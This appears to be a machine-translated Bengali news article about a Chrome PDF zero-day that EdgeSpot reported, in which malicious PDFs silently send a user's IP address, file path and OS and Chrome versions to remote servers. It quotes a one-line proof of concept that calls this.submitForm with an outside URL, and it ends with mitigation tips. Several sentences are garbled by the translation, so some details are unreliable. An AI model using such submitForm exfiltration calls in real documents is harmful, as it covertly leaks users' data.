এক্সপ্লিট শনাক্তকরণ পরিষেবা এজ এজপট পিডিএফ ডকুমেন্টগুলি শোষণ করার জন্য একটি উদ্বেগজনক ক্রোম শূন্য-দিনের দুর্বলতা আবিষ্কার করেছে। দুর্বলতা আক্রমণকারীদের ক্রোমে খোলা দূষিত পিডিএফ ডকুমেন্ট ব্যবহার করে সংবেদনশীল ডেটা সংগ্রহ করতে দেয় allows

ভুক্তভোগী গুগল ক্রোমে সম্পর্কিত পিডিএফ ফাইলগুলি খোলার সাথে সাথেই একটি দূষিত প্রোগ্রামটি ব্যবহারকারী ডেটা সংগ্রহ করে পটভূমিতে কাজ শুরু করে।

এরপরে ডেটা দূরবর্তী সার্ভারে ফরোয়ার্ড করা হয় যা হ্যাকারদের দ্বারা নিয়ন্ত্রিত হচ্ছে। আপনি ভাবছেন যে আক্রমণকারীরা কী ডেটা চুষছে, তারা আপনার পিসিতে নিম্নলিখিত ডেটাটিকে লক্ষ্য করে:

• আইপি ঠিকানা
• সিস্টেমে পিডিএফ ফাইলের পুরো পথ
• ওএস এবং ক্রোম সংস্করণ

ম্যালওয়্যার-চালিত পিডিএফ ফাইলগুলি থেকে সাবধান থাকুন

আপনি জেনে অবাক হতে পারেন যে পিডিএফ ফাইলগুলি খোলার জন্য যখন অ্যাডোব রিডার ব্যবহার করা হয় তখন কিছুই হয় না। অতিরিক্তভাবে, HTTP পোষ্ট অনুরোধগুলি কোনও ব্যবহারকারীর হস্তক্ষেপ ছাড়াই দূরবর্তী সার্ভারগুলিতে ডেটা স্থানান্তর করতে ব্যবহৃত হয়।

বিশেষজ্ঞরা দেখেছেন যে দুটি ডোমেনের একটিই রিডনটিফাইকম বা বার্পকোল্লাবোরোটারনেট ডেটা গ্রহণ করছে।

আপনি বেশিরভাগ অ্যান্টিভাইরাস সফটওয়্যার এজ স্পট দ্বারা সনাক্ত করা নমুনাগুলি সনাক্ত করতে সক্ষম নন এই বিষয়টি বিবেচনা করে আপনি আক্রমণটির তীব্রতাটি কল্পনা করতে পারেন।

বিশেষজ্ঞরা প্রকাশ করেছেন যে আক্রমণকারীরা ব্যবহারকারীদের সংবেদনশীল তথ্য সংগ্রহ করতে "this.submitForm ()" পিডিএফ জাভাস্ক্রিপ্ট এপিআই ব্যবহার করছে।

আমরা এটি একটি ন্যূনতম পিওসি দিয়ে পরীক্ষা করেছি, "this.submitForm ('http://google.com/test')" এর মতো একটি সাধারণ এপিআই কল Google Chrome কে ব্যক্তিগত ডেটা google.com এ প্রেরণ করবে।

বিশেষজ্ঞরা প্রকৃতপক্ষে জানতে পেরেছিলেন যে এই ক্রোম বাগটি দূষিত পিডিএফ ফাইলগুলির দুটি স্বতন্ত্র সেট দ্বারা ব্যবহার করা হয়েছিল। উভয়ই যথাক্রমে অক্টোবর 2017 এবং সেপ্টেম্বর 2018 এ প্রচারিত হয়েছিল।

উল্লেখযোগ্যভাবে, সংগ্রহ করা ডেটা আক্রমণকারীরা ভবিষ্যতে আক্রমণকে সূক্ষ্ম সুরতে ব্যবহার করতে পারে। প্রতিবেদনগুলি সূচিত করে যে ফাইলগুলির প্রথম ব্যাচটি ReadNotify এর পিডিএফ ট্র্যাকিং পরিষেবা ব্যবহার করে সংকলিত হয়েছিল।

ব্যবহারকারীরা ব্যবহারকারীর দৃষ্টিভঙ্গি ট্র্যাক রাখতে পরিষেবাটি ব্যবহার করতে পারেন। এজ স্পট পিডিএফ ফাইলগুলির দ্বিতীয় সেটটির প্রকৃতি সম্পর্কিত কোনও বিবরণ ভাগ করে নি।

কীভাবে সুরক্ষিত থাকবেন

এক্সপ্লোইট সনাক্তকরণ পরিষেবা এজ এজপট ক্রোম ব্যবহারকারীদের সম্ভাব্য ঝুঁকির বিষয়ে সতর্ক করতে চেয়েছিল কারণ নিকট ভবিষ্যতে প্যাচটি প্রকাশিত হবে বলে আশা করা যায় না।

এজ স্পট গত বছর দুর্বলতার বিষয়ে গুগলে জানায় এবং সংস্থা এপ্রিলের শেষের দিকে একটি প্যাচ প্রকাশ করার প্রতিশ্রুতি দেয়। এইচ

যাইহোক, আপনি বিকল্প পিডিএফ রিডার অ্যাপ্লিকেশন ব্যবহার করে স্থানীয়ভাবে প্রাপ্ত পিডিএফ ডকুমেন্টগুলি দেখে সমস্যার সাময়িকভাবে কাজ করতে বিবেচনা করতে পারেন।

বিকল্পভাবে, আপনি আপনার সিস্টেমগুলি ইন্টারনেট থেকে সংযোগ বিচ্ছিন্ন করে ক্রোমে আপনার পিডিএফ ডকুমেন্টগুলিও খুলতে পারেন। এদিকে, আপনি Chrome update৪ আপডেটের জন্য অপেক্ষা করতে পারেন যা প্রত্যাশিত ২৩ শে এপ্রিল শেষ হবে।